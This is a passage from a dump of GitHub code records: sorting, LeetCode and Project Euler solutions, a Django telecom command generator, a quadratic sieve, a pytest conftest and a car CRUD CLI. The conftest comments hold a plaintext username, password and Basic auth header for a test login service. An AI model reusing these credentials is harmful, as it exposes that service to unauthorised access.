pos=q\r\n List[pos]=tmp\r\n print(\"输入的数据按从小到大排序为:\")\r\n for j in range(12):\r\n print(\"%d\"%List[j])\r\n return\r\nInsertSort(List)\r\n","repo_name":"TYalison/Python","sub_path":"insertsort.py","file_name":"insertsort.py","file_ext":"py","file_size_in_byte":498,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"15843358806","text":"from django.shortcuts import render\nfrom django.http import HttpResponse\nimport codecs\nimport os\nfrom django.http import StreamingHttpResponse\n# Create your views here.\nfrom cmd_tool.controller import zqkc\nfrom cmd_tool.controller import zqkc\nfrom cmd_tool.controller import zoyx\nfrom cmd_tool.controller import zoyp\nfrom cmd_tool.controller import zoys\nfrom cmd_tool.controller import zdwp\nfrom cmd_tool.controller import zefc\nfrom cmd_tool.controller import zeqc\nfrom cmd_tool.controller import zeuczehc\nfrom cmd_tool.controller import zerc\nfrom cmd_tool.controller import zerm\nfrom cmd_tool.controller import zeqv12\nfrom cmd_tool.controller import zean\nfrom cmd_tool.controller import prpara\nfrom cmd_tool.controller import zeqf\nfrom cmd_tool.controller import close_bts\nfrom cmd_tool.controller import zers\nfrom cmd_tool.controller import zeqs\nfrom cmd_tool.controller import zeh\nfrom cmd_tool.controller import dicts\nfrom cmd_tool.controller import dicts2\n\ndef index(request):\n\treturn render(request,'index.html')\n\n# def upload_file(request): \n\n# \treturn render(request,'index.html')\n\ndef get_para(request):\n\tif request.method == \"POST\": # 请求方法为POST时,进行处理 \n\t\tmyFile =request.FILES.get(\"myfile\", None) # 获取上传的文��,如果没有文件,则默认为None \n\tif not myFile: \n\t\treturn HttpResponse(\"no files for upload!\") \n\t# destination = open(os.path.join(\"/home/ubuntu/python_code/django_project/ningbo_excel\",myFile.name),'wb+')\n\tdestination = open(os.path.join(\"/home/ubuntu/python_code/generatecmd\",myFile.name),'wb+')\n\tfor chunk in myFile.chunks(): # 分块写入文件 \n\t\tdestination.write(chunk) \n\tdestination.close()\n\n\tci1 = request.POST['ci_1']\n\tci2 = request.POST['ci_2']\n\tci3 = request.POST['ci_3']\n\tci4 = request.POST['ci_4']\n\tci5 = request.POST['ci_5']\n\tci6 = request.POST['ci_6']\n\tlist_ci1 = []\n\n\tlist_ci1.append(int(ci1))\n\tlist_ci1.append(int(ci2))\n\tlist_ci1.append(int(ci3))\n\tlist_ci1.append(int(ci4))\n\tlist_ci1.append(int(ci5))\n\tlist_ci1.append(int(ci6))\n\n\tlist_ci = []\n\tfor i in range(0,6):\n\t\tif list_ci1[i] == 0:\n\t\t\tlist_ci=list_ci1[0:i]\n\t\t\tbreak\n\t# print (\"list_ci_new:::\",list_ci_new)\n\n\tbs_start_ip = request.POST['ip_start']\n\tsubnet_ip = request.POST['subnet_ip']\n\tetme_ip = request.POST['etme_ip']\n\tport_zoyp1 = request.POST['port']\n\tetme_id = request.POST['etme_id']\n\t# vlanid = request.POST['vlanid']\n\t\n\tbcxu = request.POST['bcxu']\n\tcell_id = request.POST['bcf']\n\tip_zoyp = request.POST['zoyp_ip']\n\tenglish_name = request.POST['englishname']\n\n\n\tif (len(str(cell_id)) == 2):\n\t\tstr_cell_id = '0'+str(cell_id)\n\telse:\n\t\tstr_cell_id = str(cell_id)\n\t#new_bts(cell_id)\n\t#室外站\n\tif int(cell_id) <= 200:\n\t\tstr_cell_ids = str(cell_id)+'1'\n\telif int(cell_id)<=400 and int(cell_id)>200:\n\t\tstr_cell_ids = str(cell_id%200)+'4'\n\telif int(cell_id)>400 and int(cell_id)<=500:\n\t\tstr_cell_ids = str(cell_id%400)+'7'\n\t#室内站\n\telif int(cell_id)>500 and int(cell_id)<=600:\n\t\tstr_cell_ids = str(int(cell_id)-300)+'1'\n\telif int(cell_id)>600 and int(cell_id)<=700:\n\t\tstr_cell_ids = str(int(cell_id)-400)+'4'\n\telif int(cell_id)>700 and int(cell_id)<=800:\n\t\tstr_cell_ids = str(int(cell_id)-500)+'7'\n\tbts = int(str_cell_ids)\n\n\tdict_trx = dicts.dict_ci_zoyx()\n\tn = 0\n\tfor i in range(len(list_ci)):\n\t\tprint (dict_trx[list_ci[i]]['trx'])\n\t\tn = n + dict_trx[list_ci[i]]['trx']\n\n\tport_zoyp = int(port_zoyp1)\n\tstr_zqkc = zqkc.get_zqkc(subnet_ip,etme_ip)\n\tstr_zoyx = zoyx.get_zoyx(str_cell_id,bcxu,n)\n\tstr_zoyp = zoyp.get_zoyp(str_cell_id,n,ip_zoyp,port_zoyp,bs_start_ip)\n\tstr_zoys = zoys.get_zoys(str_cell_id,n)\n\tstr_zdwp = zdwp.get_zdwp(str_cell_id,n,bcxu)\n\tstr_zefc = zefc.get_zefc(cell_id,str_cell_id,etme_id,bs_start_ip)\n\tcell_count = len(list_ci) #小区个数\n\t# english_name = 'CHUANSHAQIAO' #后面有个N,是诺基亚的意思,可以不要,这里就不要了\n\tdict_programme = dicts.get_dict1_zeqc(list_ci)\n\tdict_bts = dicts.get_dict2_zeqc(list_ci)\n\tcell_id = int(cell_id)\n\tstr_zeqc = zeqc.get_zeqc(cell_id,bts,cell_count,english_name,dict_programme,dict_bts,list_ci)\n\t\n\tstr_zeuczehc = zeuczehc.get_zeuczehc(bts,cell_count)\n\n\tdict_freq = dicts.dict_freq(list_ci)\n\tdict_tsc = dicts.get_dict1_zeqc(list_ci)\n\tstr_zerc = zerc.get_zerc(cell_id,bts,n,dict_trx,list_ci,dict_freq,dict_tsc)\n\n\tstr_zerm = zerm.get_zerm(dict_trx,list_ci,cell_id,bts,n)\n\n\tdict_trx = dicts2.dict_ci_zers(list_ci)\n\tstr_zers = zers.get_zers(bts,dict_trx,list_ci)\n\n\tdict_para = dicts2.dict_ci_zeqg(list_ci)\n\tstr_zeqv1 = zeqv12.get_zeqv1(bts,dict_para,list_ci)\n\tstr_zeqv2 = zeqv12.get_zeqv2(bts,dict_para,list_ci)\n\n\tstr_zeqs = zeqs.get_zeqs(bts,list_ci)\n\n\n\n\t# dict_ltep = dicts.dict_ci_ltecp(list_ci)\n\t# str_zean = zean.get_zean(dict_ltep,list_ci,bts)\n\t\n\t#辅助作用\n\ttrx = []\n\tfor i in range(0,len(list_ci)):\n\t\ttrx.append(dict_trx[list_ci[i]]['trx'])\n\t# print (\"trx :::: \",trx)\n\ttrx_use=[]\n\ttrx_use.append(0)\n\tfor x in range(0,len(list_ci)-1):\n\t\ttrx_use.append(trx_use[x]+trx[x])\n\t# print (\"trx_use :::\",trx_use)\n\n\t\t\n\t#功控参数\n\t# bts = int(str_cell_ids)\n\tdict_para = dicts2.dict_ci_zeu(list_ci)\n\tstr_zeug = prpara.get_zeug(bts,dict_para,dict_trx,list_ci)\n\tstr_zeua = prpara.get_zeua(bts,dict_para,dict_trx,list_ci)\n\tstr_zeum = prpara.get_zeum(bts,dict_para,dict_trx,list_ci)\n\tstr_zeus = prpara.get_zeus(bts,dict_para,dict_trx,list_ci)\n\tstr_zeuq = prpara.get_zeuq(bts,dict_para,dict_trx,list_ci)\n\t#BTS参数\n\tdict_para = dicts2.dict_ci_zeqg(list_ci)\n\tstr_zeqf = zeqf.get_zeqf(bts, dict_para,dict_trx, list_ci)\n\t#可能要关BTS参数\n\tstr_zeqg = close_bts.get_zeqg(bts, dict_para, dict_trx,list_ci)\n\tstr_zeqj = close_bts.get_zeqj(bts, dict_para, dict_trx,list_ci)\n\tstr_zeqm = close_bts.get_zeqm(bts, dict_para, dict_trx,list_ci)\n\tstr_zeqb = close_bts.get_zeqb(bts, dict_para, dict_trx,list_ci)\n\tstr_zeqe = close_bts.get_zeqe(bts, dict_para, dict_trx,list_ci)\n\tstr_zeqv = close_bts.get_zeqv(bts, dict_para, dict_trx,list_ci)\n\tstr_zeqy = close_bts.get_zeqy(bts, dict_para, dict_trx,list_ci)\n\n\t#切换参数\n\tdict_para = dicts2.dict_ci_zehg(list_ci)\n\tstr_zehg = zeh.get_zehg(bts, dict_para,dict_trx, list_ci)\n\tstr_zeha = zeh.get_zeha(bts, dict_para, dict_trx,list_ci)\n\tstr_zehs = zeh.get_zehs(bts, dict_para, dict_trx,list_ci)\n\tstr_zehq = zeh.get_zehq(bts, dict_para, dict_trx,list_ci)\n\tstr_zehi = zeh.get_zehi(bts, dict_para, dict_trx,list_ci)\n\tstr_zehn = zeh.get_zehn(bts, dict_para, dict_trx,list_ci)\n\n\tstr_cmd = ''\n\tstr_cmd += str_zqkc\n\tstr_cmd += '\\n'\n\tstr_cmd += str_zoyx\n\tstr_cmd += '\\n'\n\tstr_cmd += str_zoyp\n\tstr_cmd += '\\n'\n\tstr_cmd += str_zoys\n\tstr_cmd += '\\n'\n\tstr_cmd += str_zdwp\n\tstr_cmd += '\\n'\n\tstr_cmd += str_zefc\n\tstr_cmd += '\\n'\n\tstr_cmd += str_zeqc\n\tstr_cmd += '\\n'\n\tstr_cmd += str_zeuczehc\n\tstr_cmd += '\\n'\n\tstr_cmd += str_zerc\n\tstr_cmd += '\\n'\n\tstr_cmd += str_zerm\n\tstr_cmd += '\\n'\n\n\tstr_cmd += str_zers\n\tstr_cmd += '\\n'\n\tstr_cmd += str_zeqv1\n\tstr_cmd += '\\n'\n\tstr_cmd += str_zeqv2\n\tstr_cmd += '\\n'\t\n\t# str_cmd += str_zeqs\n\tstr_cmd += '\\n'\n\n\tstr_cmd += '#功控参数'\n\tstr_cmd += '\\n'\n\tstr_cmd += str_zeug\n\tstr_cmd += '\\n'\n\tstr_cmd += str_zeua\n\tstr_cmd += '\\n'\n\tstr_cmd += str_zeum\n\tstr_cmd += '\\n'\n\tstr_cmd += str_zeus\n\tstr_cmd += '\\n'\n\tstr_cmd += str_zeuq\n\tstr_cmd += '\\n'\n\tstr_cmd += '#BTS参数'\n\tstr_cmd += '\\n'\n\tstr_cmd += str_zeqf\n\tstr_cmd += '\\n'\n\tstr_cmd += '#可能要关BTS'\n\tstr_cmd += '\\n'\n\tstr_cmd += str_zeqg\n\tstr_cmd += '\\n'\n\tstr_cmd += str_zeqj\n\tstr_cmd += '\\n'\n\tstr_cmd += str_zeqm\n\tstr_cmd += '\\n'\n\tstr_cmd += str_zeqb\n\tstr_cmd += '\\n'\n\tstr_cmd += str_zeqe\n\tstr_cmd += '\\n'\n\tstr_cmd += str_zeqv\n\tstr_cmd += '\\n'\n\tstr_cmd += str_zeqy\n\tstr_cmd += '\\n'\n\tstr_cmd += '#切换参数'\n\tstr_cmd += '\\n'\n\tstr_cmd += str_zehg\n\tstr_cmd += '\\n'\n\tstr_cmd += str_zeha\n\tstr_cmd += '\\n'\t\n\tstr_cmd += str_zehs\n\tstr_cmd += '\\n'\n\tstr_cmd += str_zehq\n\tstr_cmd += '\\n'\n\tstr_cmd += str_zehi\n\tstr_cmd += '\\n'\n\tstr_cmd += str_zehn\n\tstr_cmd += '\\n'\n\n\tstr_cmd += str_zeqs\n\tstr_cmd += '\\n'\n\n\n\tf1 = codecs.open(r\"cmd.txt\",'w','utf-8')\n\tf1.write(str_cmd)\n\tf1.close()\n\t\n\tf = codecs.open(\"cmd.txt\",'rb','utf-8')\n\tc = f.read()\n\tf.close()\n\tresponse = StreamingHttpResponse(c)\n\tresponse['Content-Type'] = 'application/octet-stream'\n\tresponse['Content-Disposition'] = 'attachment;filename=\"cmd.txt\"'\n\t\n\treturn response\n\t# return HttpResponse(\"上传成功\")\n","repo_name":"Runbacktoo/python-ubuntu","sub_path":"generate_cmd/generate_cmd/generate_cmd/cmd_tool/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":8206,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"73022674385","text":"class Solution:\n def groupAnagrams(self, strs: List[str]) -> List[List[str]]:\n answer = {}\n for word in strs:\n key = \"\".join((sorted(word)))\n if key not in answer:\n answer[key] = [word]\n else:\n answer[key].append(word)\n return answer.values()","repo_name":"Baluyotkevin/LeetPractice","sub_path":"49-group-anagrams/group-anagrams.py","file_name":"group-anagrams.py","file_ext":"py","file_size_in_byte":329,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"40003066560","text":"from sqlalchemy.ext.asyncio import (\n create_async_engine,\n AsyncSession\n)\nfrom sqlalchemy.orm import sessionmaker\n\nDATABASE_URL = 'sqlite+aiosqlite:///database.db'\n\nengine = create_async_engine(\n DATABASE_URL,\n echo=True,\n future=True\n)\n\nasync_session = sessionmaker(\n bind=engine,\n class_=AsyncSession,\n autocommit=False,\n autoflush=False,\n expire_on_commit=False,\n)\n\n\n# Depends(get_session)\nasync def get_session() -> AsyncSession:\n async with async_session() as session:\n yield session\n","repo_name":"ghtak/fastapi-base","sub_path":"configs/database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":530,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"29226517539","text":"import pyprimes\n'''\nIt is possible to write ten as the sum of primes \nin exactly five different ways:\n\n7 + 3\n5 + 5\n5 + 3 + 2\n3 + 3 + 2 + 2\n2 + 2 + 2 + 2 + 2\n\nWhat is the first value which can be written \nas the sum of primes in over five thousand different ways?\n'''\nprime_gen = pyprimes.primes()\nprimes = [next(prime_gen)]\n\nways = [0]\ntarget= 10\n\nwhile ways[-1] < 5000:\n\n target += 1;\n\n # generate primes up to target\n while primes[-1] < target : primes.append(next(prime_gen))\n\n # storing ways in a list, use integer as index (1 ... 99)\n ways = [0]*(target +1);\n\n ways[0] = 1; # arrived at zero : no more extra possibilities left: 1 way possible\n\n # for each integer, starting from 1\n # last prime is bigger than target!\n for prime in primes[0:-1]:\n\n # from 1 to target, calculate ways to change\n for i in range(prime, target+1):\n ways[i] += ways[i-prime]\n #print(ways)\n\nprint(\"{} can be written as the sum of primes in {} ways\".format(target,ways[-1]))","repo_name":"mccornet/project_euler_2014","sub_path":"problem_077.py","file_name":"problem_077.py","file_ext":"py","file_size_in_byte":1015,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"24077782280","text":"#Prompt user to enter a message\r\ncode = str(input(\"Please enter the coded text: \"))\r\n# Prompt user to enter a shift\r\nshift = int(input(\"Please enter the distance value: \"))\r\n# Print the decrypted message\r\nplainText = \"\"\r\n\r\n#Decrypt Loop\r\nfor ch in code:\r\n #Set the number of the character\r\n ordValue = ord(ch)\r\n #Subtract the distance value from the coded letter\r\n cipherValue = (ordValue - shift)\r\n if cipherValue > 0:\r\n plainText += chr(cipherValue)\r\n\r\n if cipherValue < 0:\r\n cipherValue = 127 - (shift - (1 + ordValue))\r\n plainText += chr(cipherValue)\r\nprint(plainText)\r\n","repo_name":"GlaceonDude/Projects","sub_path":"decrypt_ab.py","file_name":"decrypt_ab.py","file_ext":"py","file_size_in_byte":613,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"14474092166","text":"# %%\nimport sys\nsys.path.append(\"../\")\nfrom src.layers.pool import MaxPoolLayerND\nfrom tensorflow import keras\nimport numpy as np\nnp.random.seed(99)\n\nn = 1 # batch size\ninput_shape = (n,6,5,4)\npool_size = (2,2)\nstride = (2,1)\n\n# generate input\ninput = np.random.randint(10, size = input_shape)\n\n# nd max pool layer\nlayer = MaxPoolLayerND(pool_size, stride)\n\n# keras model\nmodel = keras.Sequential([\n keras.Input(shape=(input_shape[1:])),\n keras.layers.MaxPool2D(pool_size, stride)\n])\n\n# compare outputs\nprint(\"ND LAYER OURPUT\")\nprint(layer.forward_pass(input))\nprint(\"KERAS OUTPUT\")\nprint(model.predict(input))\n\n# %%\n","repo_name":"TopiCsarno/Adaptiv_hazi","sub_path":"tests/test_pool_nd.py","file_name":"test_pool_nd.py","file_ext":"py","file_size_in_byte":624,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"71450674386","text":"\"\"\"\nQuadratic Sieve Algorithm - Written by Lucas Cecchi\n\"\"\"\nimport math\n\n\ndef jacobi(n, k):\n if k == 2:\n return 1\n assert (k > 0 and k % 2 == 1)\n n = n % k\n t = 1\n while n != 0:\n while n % 2 == 0:\n n /= 2\n r = k % 8\n if r == 3 or r == 5:\n t = -t\n n, k = k, n\n if n % 4 == k % 4 == 3:\n t = -t\n n %= k\n if k == 1:\n return t\n else:\n return 0\n\n\ndef euclid(a, b):\n while b:\n a, b = b, a % b\n return a\n\n\ndef extended_euclid(a, b):\n \"\"\"\n :param a: an integer\n :param b: an integer\n :return:\n old_s: n\n old_t: m\n old_r: gcd(a,b)\n memo: r_i computation memo\n \"\"\"\n memo = []\n\n old_r, r, old_s, s, old_t, t = a, b, 1, 0, 0, 1\n\n while r != 0:\n q = old_r // r\n\n prov = r\n r = old_r - q * prov\n old_r = prov\n\n prov = s\n s = old_s - q * prov\n old_s = prov\n\n prov = t\n t = old_t - q * prov\n old_t = prov\n\n memo.append(old_r)\n\n return old_s, old_t, old_r, memo\n\n\n\"\"\"\nTrial Division, Tonelli's, Strong Pseudo-Prime Test\n\"\"\"\n\n\ndef trial_division(primes, n):\n out = []\n for p in primes:\n exp = 0\n while p ** exp <= n and n % p ** exp == 0:\n exp += 1\n exp -= 1 if exp > 0 else 0\n out.append(exp)\n n /= p ** exp\n\n return out, int(n)\n\n\ndef strong_pseudo_prime(bases, n):\n if n == 2:\n return True\n elif n < 2 or n % 2 == 0:\n return False\n\n a, t = trial_division([2], n - 1)\n\n def base_b_pseudo(base):\n if base == n:\n return True\n\n t_test = t\n b_test = pow(base, t_test, n)\n\n if b_test == n - 1 or b_test == 1:\n return True\n\n for _ in range(a[0]):\n b_test = pow(b_test, 2, n)\n if b_test == n - 1:\n return True\n\n return False\n\n is_pseudo_prime = True\n for b in bases:\n is_pseudo_prime = is_pseudo_prime and base_b_pseudo(b)\n\n return is_pseudo_prime\n\n\ndef inverse_modulo(a, n):\n s, t, r, memo = extended_euclid(a, n)\n return (s % n + n) % n if r == 1 else None\n\n\ndef find_non_residue(p, bases=(2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31,\n 37, 41, 43, 47, 53, 59, 61, 67, 71, 73, 79, 83, 89, 97)):\n for b in bases:\n if jacobi(b, p) == -1:\n return b\n\n\ndef tonelli(a, p):\n if jacobi(a, p) != 1:\n return None\n s_l, t = trial_division([2], p - 1)\n s = s_l[0]\n b = find_non_residue(p)\n i = 2\n i_l = [2]\n\n for k in range(2, s + 1):\n if pow(a * inverse_modulo(b, p) ** i, t * (2 ** (s - k)), p) != 1:\n i = i + (2 ** (k - 1))\n i_l.append(i)\n return ((b ** (i // 2)) * ((a * inverse_modulo(b, p) ** i) ** ((t + 1) // 2))) % p, i_l\n\n\n\"\"\"\nLinear Algebra Tools\n\"\"\"\n\n\ndef reduce_mat(M, mod=2):\n for row_i in range(len(M)):\n for col_i in range(len(M[row_i])):\n M[row_i][col_i] = int(M[row_i][col_i] % mod)\n\n\ndef rref_mod2(M):\n reduce_mat(M)\n\n lead = 0\n rowCount = len(M)\n columnCount = len(M[0])\n for r in range(rowCount):\n if lead >= columnCount:\n return\n i = r\n while M[i][lead] == 0:\n i += 1\n if i == rowCount:\n i = r\n lead += 1\n if columnCount == lead:\n return\n\n # Swap rows i and r\n if i != r:\n M[i], M[r] = M[r], M[i]\n\n for i in range(rowCount):\n if i != r:\n # Subtract M[i, lead] multiplied by row r from row i\n lead_val = M[i][lead]\n M[i] = [int((m_i - (lead_val * m_r)) % 2)\n for m_r, m_i in zip(M[r], M[i])\n ]\n lead += 1\n\n\ndef get_solution_basis(V):\n # Reduce\n rref_mod2(V)\n\n # Find free variables\n pivot_col = set()\n for i in range(len(V)):\n for j in range(len(V[0])):\n if V[i][j] == 1:\n pivot_col.add(j)\n break\n free_list = set([i for i in range(len(V[0]))]) - pivot_col\n sol_vecs = []\n\n for free_var in free_list:\n sol_vec = []\n sol_idx = 0\n row_idx = 0\n while sol_idx < len(V[0]):\n if sol_idx in free_list:\n sol_vec.append(int(sol_idx == free_var))\n else:\n sol_vec.append(V[row_idx][free_var])\n row_idx += 1\n sol_idx += 1\n\n sol_vecs.append(sol_vec)\n\n return sol_vecs\n\n\n\"\"\"\nQuadratic Sieve tools\n\"\"\"\n\n\ndef generate_factor_base(B, n):\n # Note: this may allow composites for very large B\n for b in reversed(range(3, B)):\n if strong_pseudo_prime([2, 3, 5, 7, 11], b) and jacobi(n, b) == 1:\n yield b\n yield 2 if B > 2 else None\n\n\n\ndef quadratic_sieve(n, B, M, qs_threshold, bypass_psuedoprime_test=False):\n\n if not bypass_psuedoprime_test and strong_pseudo_prime([2, 3, 5, 7], n):\n print(f\"{n} is likely prime\")\n return\n\n # Preliminaries\n k = math.ceil(math.sqrt(n))\n r_l = [r for r in range(k, k + M + 1)]\n s_r = [math.log((r ** 2) - n) for r in r_l]\n factor_base = list(reversed([b for b in generate_factor_base(B, n)]))\n residue_base = [1] + [tonelli(n, p)[0] for p in factor_base[1:]]\n\n sub_count = 0\n # Sieve:\n # subtract log(p) from divisible r_i\n for t, p in zip(residue_base, factor_base):\n r_i = 0\n seen = set()\n while r_i < len(r_l) and r_l[r_i] % p != t:\n r_i += 1\n while r_i < len(r_l) and r_l[r_i] % p == t:\n seen.add(r_l[r_i])\n sub_count += 1\n s_r[r_i] -= math.log(p)\n r_i += p\n r_i = 0\n while r_i < len(r_l) and r_l[r_i] % p != (p - t):\n r_i += 1\n while r_i < len(r_l) and r_l[r_i] not in seen and r_l[r_i] % p == (p - t):\n sub_count += 1\n s_r[r_i] -= math.log(p)\n r_i += p\n\n sieved_r = []\n for s_i in range(len(s_r)):\n if abs(s_r[s_i]) < qs_threshold:\n sieved_r.append(r_l[s_i])\n\n if len(sieved_r) < len(factor_base) + 1:\n print(\"Not enough r values, sieve may fail\")\n\n # Get factorizations, reverse and transpose\n M_tup = [trial_division(factor_base, r ** 2 - n) for r in sieved_r]\n\n # Make sure all the values are B-smooth\n for row in M_tup:\n if row[1] != 1:\n print(\"Sieved r values are not all B-smooth, adjust parameters or sieve may fail\")\n return\n\n M = [m[0] for m in M_tup]\n\n M_t = [[M[j][i] for j in range(len(M))] for i in range(len(M[0]))]\n\n # Solve\n solutions = get_solution_basis(M_t)\n\n for sol in solutions:\n # Calculate x\n x = 1\n for i in range(len(sol)):\n if sol[i]:\n x *= sieved_r[i]\n x %= n\n\n y_exp = [0] * len(factor_base)\n for i in range(len(sol)):\n if sol[i] == 1:\n for exponent_i in range(len(M[i])):\n y_exp[exponent_i] += M[i][exponent_i]\n y = 1\n for i in range(len(y_exp)):\n y *= factor_base[i] ** (y_exp[i] // 2)\n y %= n\n\n assert (y * y) % n == (x * x) % n\n\n # Kraitchik's\n f = euclid(abs(x - y), n)\n if f != 1 and f != n:\n assert n % f == 0\n return f\n\n\nclass QuadraticSieveFactorizer:\n\n def __init__(self, B, M, qs_threshold, bypass_pseudo_prime_test) -> None:\n self.B = B\n self.M = M\n self.qs_threshold = qs_threshold\n self.bypass_pseudo_prime_test = bypass_pseudo_prime_test\n\n def __call__(self, n):\n return quadratic_sieve(n, self.B, self.M, self.qs_threshold, self.bypass_pseudo_prime_test)\n \n \n ","repo_name":"Lucasc-99/QuadraticSieve","sub_path":"quadratic_sieve_factorization.py","file_name":"quadratic_sieve_factorization.py","file_ext":"py","file_size_in_byte":7833,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"6899323926","text":"# Set up logger function so we can log to two files\nimport logging\n\nformatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n\n\ndef setup_logger(name, log_file, level=logging.INFO):\n handler = logging.FileHandler(log_file)\n handler.setFormatter(formatter)\n\n new_logger = logging.getLogger(name)\n new_logger.setLevel(level)\n new_logger.addHandler(handler)\n\n return new_logger\n\nmy_logger = setup_logger('my_logger', 'src/logging.log', level=logging.WARNING)\ninfo_logger = setup_logger('info_logger', 'src/info.log', level=logging.INFO)","repo_name":"AsharHabib/reimbursement-system","sub_path":"src/logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":579,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"74171690704","text":"# -*- coding: utf-8 -*-\n# @File : conftest.py\n# _author_=feng\n# date: 2021/1/13\nimport requests\nimport pytest\nimport xlrd\nfrom xlutils.copy import copy\nfrom TP_Api_Test.configs.config import HOST\nfrom TP_Api_Test.Lib.Login_Module.login_token import Loginclass\n\n\n@pytest.fixture(scope=\"session\")\ndef login_fixture():\n s = requests.Session()\n info = Loginclass(s)\n info.login()\n yield s\n s.close()\n\n@pytest.fixture(scope=\"session\")\ndef set_excelData():\n # 1-excel表路径\n excelDir = '../data/TP_接口自动化测试用例V1.1.xls'\n # 2- 打开excel对象--formatting_info=True 保持样式\n workBook = xlrd.open_workbook(excelDir, formatting_info=True)\n workBookNew = copy(workBook) # 复制一个新excel文件对象\n # workSheetNew = workBookNew.get_sheet(n)\n # 取复制出来的新excel文件对象的第一个子表\n workBookNew.save(r'../report/res.xls')\n return workBookNew\n\n# @pytest.fixture(scope='session', autouse=True) # 整一个包都会执行,scope只作用域\n# def get_token():\n# login_url = f'{HOST}api/v1/sys/oauth/token'\n# # 1.构造请求消息体\n# header = {'Content-Type': 'application/x-www-form-urlencoded',\n# 'Authorization': 'Basic emhhbmppYW5nLXNzby10ZXN0OmFhYTQ0ZjI3LTc0MmYtNDMzMS05ZTA0LTllMDFmMGE1MmVjNg=='}\n# # 2.构造请求消息体:口诀2\n# payload = {\"grant_type\":\"password\", \"username\":\"17688701458\", \"password\":\"Sutpc@2020\",\n# \"cid\":\"dd7e5924-b5b4-4a0b-b269-66f11ef92b16\", \"scope\":\"all\", \"imageCode\":\"9527\"}\n# # # 3.发送Post请求\n# r = requests.post(login_url, headers=header, data=payload)\n# # print(r.json()['access_token'])\n#\n# return r\n\n# @pytest.fixture(scope='session',autouse=True) # 整一个包都会执行,scope只作用域\n# def start_demo(request):# 这个一个运行该包下,任何一个test文件,都会一开始就执行的操作\n# print('---开始执行自动化测试---') # 数据准备\n#\n# # 数据清除操作:删除测试生成的垃圾数据\n# def fin(): # 数据清除,相当于teardown。\n# print('---自动化测试---结束') # 数据清除\n# request.addfinalizer(fin)\n\n# 那么环境初始化,是否可以测试人员手动调用?---可以的\n# @pytest.fixture(scope='function')\n# def update_shop_init():#更新商铺的环境初始化\n# #1- 登录---setup_class---已经在类初始化做了--这边不需要做\n# print('---我的作用是商铺更新的初始化操作---')\n# #1- 登录成功\n# token = Login().login({\"username\":\"sq0777\",\"password\":\"xintian\"},getToken=True)\n# #2- 列出商铺--id\n# shopId=MyShop(token).shop_list({'page':1,'limit':20})['data']['records'][0]['id']\n# #3-文件上传\n# imageInfo = MyShop(token).file_upload('123.png','../data/123.png')\n# return shopId,imageInfo#元组类型\n","repo_name":"kakashi-01/TP","sub_path":"TP_Api_Test/test_case/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":2866,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"36963439049","text":"from car import Carro, Motor\nfrom database import Database\n\n# Classe base para a interface de linha de comando\nclass SimpleCLI:\n def __init__(self):\n self.commands = {} # Dicionário para armazenar comandos\n\n # Método para adicionar um comando ao dicionário\n def add_command(self, name, function):\n self.commands[name] = function\n\n # Método para executar a interface de linha de comando\n def run(self):\n while True:\n command = input(\"Enter a command: \")\n if command == \"quit\":\n print(\"Goodbye!\")\n break\n elif command in self.commands:\n self.commands[command]()\n else:\n print(\"Invalid command. Try again.\")\n\n# Classe para a interface de linha de comando específica para carros\nclass CarCLI(SimpleCLI):\n def __init__(self, car_crud, concessionaria):\n super().__init__()\n self.car_crud = car_crud # Instância da classe CarCRUD\n self.concessionaria = concessionaria # Instância da classe Concessionaria\n # Adicionando comandos específicos para carros\n self.add_command(\"create\", self.create_car)\n self.add_command(\"read\", self.read_car)\n self.add_command(\"update\", self.update_car)\n self.add_command(\"delete\", self.delete_car)\n\n # Método para criar um carro\n def create_car(self):\n # Solicitando informações do carro ao usuário\n marca = input(\"Enter the car's brand: \")\n modelo = input(\"Enter the car's model: \")\n ano = int(input(\"Enter the car's year: \"))\n preco = float(input(\"Enter the car's price: \"))\n cor = input(\"Enter the car's color: \")\n tipo = input(\"Enter the motor's type: \")\n potencia = int(input(\"Enter the motor's power: \"))\n cavalos = int(input(\"Enter the motor's horsepower: \"))\n combustivel = input(\"Enter the motor's fuel type: \")\n \n # Criando instâncias de Motor e Carro\n motor = Motor(tipo, potencia, cavalos, combustivel)\n car = Carro(marca, modelo, ano, preco, cor, motor)\n \n # Adicionando o relacionamento com a concessionária\n car.concessionaria = self.concessionaria\n\n # Chamando o método create da classe CarCRUD\n self.car_crud.create(car)\n\n # Método para ler as informações de um carro\n def read_car(self):\n # Solicitando a marca e o modelo do carro ao usuário\n marca = input(\"Enter the car's brand: \")\n modelo = input(\"Enter the car's model: \")\n # Chamando o método read da classe CarCRUD\n car = self.car_crud.read(marca, modelo)\n if car:\n car.descricao() # Imprimindo a descrição do carro se ele for encontrado\n else:\n print(\"Car not found.\")\n\n # Método para atualizar as informações de um carro\n def update_car(self):\n # Solicitando a marca e o modelo do carro ao usuário\n marca = input(\"Enter the car's brand: \")\n modelo = input(\"Enter the car's model: \")\n # Chamando o método read da classe CarCRUD para encontrar o carro\n car = self.car_crud.read(marca, modelo)\n\n if car:\n print(\"Car found - CLI.\")\n # Solicitando as novas informações do carro ao usuário\n novo_modelo = input(\"Enter the car's new model: \")\n novo_ano = input(\"Enter the car's new year: \")\n novo_preco = input(\"Enter the car's new price: \")\n nova_cor = 